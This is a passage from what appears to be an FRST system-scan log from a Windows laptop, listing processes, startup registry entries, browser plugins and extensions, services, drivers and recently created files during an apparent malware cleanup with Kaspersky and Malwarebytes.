Anti-Malware\mbamservice.exe (Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe () C:\Windows\System32\valWBFPolicyService.exe (AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe (CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe (AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe (AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\plugin-nm-server.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-07-21] (IDT, Inc.) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2916152 2012-08-24] (Synaptics Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.) HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-31] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-18] (Adobe Systems Incorporated) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [FreeAC] => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe [1330008 2012-12-11] (Comfort Software Group) ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft) ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Start Page = [url]https://www.google.com/[/url] HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [url]http://g.msn.com/HPNOT13/1[/url] HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [url]http://g.msn.com/HPNOT13/1[/url] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [url]http://g.msn.com/HPNOT13/1[/url] HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = [url]http://g.msn.com/HPNOT13/1[/url] HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = [url]http://g.msn.com/HPNOT13/1[/url] SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = [url]http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS[/url] SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = [url]http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF[/url] SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = [url]http://rover.ebay.com/rover/1/711-154371-11896-2/4[/url] ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = [url]http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS[/url] SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = [url]http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF[/url] SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = [url]http://rover.ebay.com/rover/1/711-154371-11896-2/4[/url] ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms} SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> DefaultScope {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = [url]https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}[/url] SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = [url]http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS[/url] SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = [url]https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}[/url] SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = [url]http://rover.ebay.com/rover/1/711-154371-11896-2/4[/url] ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms} BHO: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft) BHO: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft) BHO-x32: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) BHO-x32: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO-x32: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard) BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft) Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft) Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.) FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll ( HP) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF Plugin-x32: @kaspersky.com/content_blocker_6418E0D362104DADA084DC312DFA8ABC -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]content_blocker@kaspersky.com[/email] () FF Plugin-x32: @kaspersky.com/online_banking_69A4E213815F42BD863D889007201D82 -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]online_banking@kaspersky.com[/email] () FF Plugin-x32: @kaspersky.com/virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]virtual_keyboard@kaspersky.com[/email] () FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL (Nero AG) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll () FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF HKLM-x32\...\Firefox\Extensions: [[email]content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com[/email]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]content_blocker@kaspersky.com[/email] FF Extension: Dangerous Websites Blocker - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]content_blocker@kaspersky.com[/email] [2014-12-01] FF HKLM-x32\...\Firefox\Extensions: [[email]virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com[/email]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]virtual_keyboard@kaspersky.com[/email] FF Extension: Virtual Keyboard - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]virtual_keyboard@kaspersky.com[/email] [2014-12-01] FF HKLM-x32\...\Firefox\Extensions: [[email]online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com[/email]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]online_banking@kaspersky.com[/email] FF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\[email]online_banking@kaspersky.com[/email] [2014-12-01] Chrome: ======= CHR Profile: C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-08] CHR Extension: (Google Drive) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-08] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-23] CHR Extension: (YouTube) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-08] CHR Extension: (Google Search) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-08] CHR Extension: (Kaspersky Protection) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-12-01] CHR Extension: (Website Logon) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\fegekclkdhbnfdcmomlpegkkndgnmfmo [2014-05-08] CHR Extension: (Google Wallet) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-08] CHR Extension: (Gmail) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-08] CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - [url]https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho[/url] [] CHR HKLM-x32\...\Chrome\Extension: [fegekclkdhbnfdcmomlpegkkndgnmfmo] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2012-07-12] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [39528 2011-09-16] (ArcSoft Inc.) S2 AVP15.0.1; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\avp.exe [234520 2014-08-30] (Kaspersky Lab ZAO) R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed] R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641320 2012-08-10] (HP) R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-10] (Hewlett-Packard Company) [File not signed] R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2011-02-04] (Nalpeiron Ltd.) [File not signed] R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [321536 2012-07-21] (IDT, Inc.) [File not signed] S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed] R3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401256 2012-07-16] (AuthenTec, Inc.) R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed] S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-21] (Microsoft Corporation) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink) R0 cm_km_w; C:\Windows\System32\DRIVERS\cm_km_w.sys [238288 2013-01-14] (Kaspersky Lab UK Ltd) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-01] () R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [468576 2014-03-31] (Kaspersky Lab ZAO) R2 kldisk; C:\Windows\system32\DRIVERS\kldisk.sys [46144 2014-07-02] (Kaspersky Lab ZAO) S0 klelam; C:\Windows\System32\DRIVERS\klelam.sys [29616 2012-07-27] (Kaspersky Lab) R3 klflt; C:\Windows\system32\DRIVERS\klflt.sys [150536 2014-08-18] (Kaspersky Lab ZAO) R1 klhk; C:\Windows\system32\DRIVERS\klhk.sys [247480 2014-08-12] (Kaspersky Lab ZAO) R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [801288 2014-08-20] (Kaspersky Lab ZAO) R1 KLIM6; C:\Windows\system32\DRIVERS\klim6.sys [30304 2014-02-25] (Kaspersky Lab ZAO) S3 klkbdflt; C:\Windows\system32\DRIVERS\klkbdflt.sys [28768 2014-03-28] (Kaspersky Lab ZAO) S3 klmouflt; C:\Windows\system32\DRIVERS\klmouflt.sys [29280 2013-08-08] (Kaspersky Lab ZAO) R1 klpd; C:\Windows\system32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO) R1 klwfp; C:\Windows\system32\DRIVERS\klwfp.sys [69816 2014-07-25] (Kaspersky Lab ZAO) R1 Klwtp; C:\Windows\system32\DRIVERS\klwtp.sys [74424 2014-08-13] (Kaspersky Lab ZAO) R1 kneps; C:\Windows\system32\DRIVERS\kneps.sys [179776 2014-07-09] (Kaspersky Lab ZAO) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-01] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation) S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated) R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated) U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys [34808 2014-11-19] () R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.) S3 ALSysIO; \??\C:\Users\ADMINI~1\AppData\Local\Temp\ALSysIO64.sys [X] S1 bcbus; \SystemRoot\System32\drivers\bcbus.sys [X] R4 klkbdflt2; \SystemRoot\system32\DRIVERS\klkbdflt2.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-01 09:39 - 2014-12-01 09:39 - 00002330 _____ () C:\Users\johnsmith\Desktop\Safe Money.lnk 2014-12-01 09:38 - 2014-12-01 09:38 - 00002132 _____ () C:\Users\Public\Desktop\Kaspersky Internet Security.lnk 2014-12-01 09:38 - 2014-12-01 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security 2014-12-01 09:38 - 2013-05-06 09:13 - 00110176 _____ (Kaspersky Lab ZAO) C:\Windows\system32\klfphc.dll 2014-12-01 09:36 - 2014-12-01 09:43 - 00000000 ____D () C:\ProgramData\Kaspersky Lab 2014-12-01 09:36 - 2014-12-01 09:36 - 00000000 ____D () C:\Program Files (x86)\Kaspersky Lab 2014-12-01 09:36 - 2014-08-20 18:04 - 00801288 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klif.sys 2014-12-01 09:36 - 2014-08-18 14:43 - 00150536 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klflt.sys 2014-12-01 09:36 - 2014-08-12 18:32 - 00247480 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klhk.sys 2014-12-01 09:28 - 2014-12-01 09:28 - 05005408 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-12-01 09:25 - 2014-11-20 13:56 - 00713672 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-12-01 09:25 - 2014-11-20 13:56 - 00106440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-12-01 07:58 - 2014-12-01 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2014-12-01 07:58 - 2014-12-01 07:58 - 00000117 _____ () C:\Windows\system32\netcfg-763703.txt 2014-12-01 07:57 - 2014-12-01 08:59 - 00000000 ____D () C:\Users\johnsmith\Desktop\mbar 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-627218.txt 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-624156.txt 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-618343.txt 2014-12-01 07:51 - 2014-12-01 07:51 - 00001139 _____ () C:\Windows\system32\netcfg-333515.txt 2014-12-01 07:51 - 2014-12-01 07:51 - 00001134 _____ () C:\Windows\system32\netcfg-329937.txt 2014-12-01 07:48 - 2014-12-01 07:48 - 00000117 _____ () C:\Windows\system32\netcfg-157515.txt 2014-12-01 07:47 - 2014-12-01 07:47 - 00043664 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-01 07:22 - 2014-12-01 07:37 - 16448208 _____ (Malwarebytes Corp.) C:\Users\johnsmith\Desktop\mbar-1.08.2.1001.exe 2014-12-01 01:34 - 2014-10-08 21:00 - 01519104 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll 2014-12-01 01:34 - 2014-10-08 21:00 - 01484288 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe 2014-12-01 01:34 - 2014-10-08 21:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\vsstrace.dll 2014-12-01 01:34 - 2014-10-08 20:59 - 01195520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll 2014-12-01 01:34 - 2014-10-08 20:59 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vsstrace.dll 2014-12-01 01:34 - 2012-09-19 23:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\eventcls.dll 2014-12-01 01:34 - 2012-09-19 22:53 - 00015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eventcls.dll 2014-11-30 23:38 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2014-11-30 23:38 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2014-11-30 23:23 - 2014-10-11 00:44 - 19764736 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2014-11-30 23:23 - 2014-10-10 22:57 - 17562112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll 2014-11-30 23:23 - 2014-10-08 20:59 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll 2014-11-30 23:23 - 2014-10-08 20:59 - 00212992 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll 2014-11-30 23:23 - 2014-10-08 20:58 - 00458240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll 2014-11-30 23:23 - 2014-09-21 22:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll 2014-11-30 23:23 - 2014-09-21 20:56 - 00513536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll 2014-11-30 23:23 - 2014-04-19 02:39 - 00628024 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe 2014-11-30 23:23 - 2014-04-19 01:45 - 00693760 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll 2014-11-30 23:23 - 2014-04-19 01:45 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2014-11-30 23:23 - 2014-04-18 23:57 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll 2014-11-30 23:23 - 2014-04-18 23:57 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2014-11-30 23:23 - 2014-01-30 17:48 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll 2014-11-30 23:19 - 2014-10-11 00:45 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2014-11-30 23:19 - 2014-10-11 00:44 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-11-30 23:19 - 2014-10-11 00:44 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll 2014-11-30 23:19 - 2014-10-11 00:43 - 02307072 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-11-30 23:19 - 2014-10-10 22:58 - 08858624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2014-11-30 23:19 - 2014-10-10 22:57 - 02416640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-11-30 23:19 - 2014-10-10 22:57 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll 2014-11-30 23:19 - 2014-10-10 22:56 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-11-30 23:19 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll 2014-11-30 23:19 - 2014-06-12 16:29 - 02146304 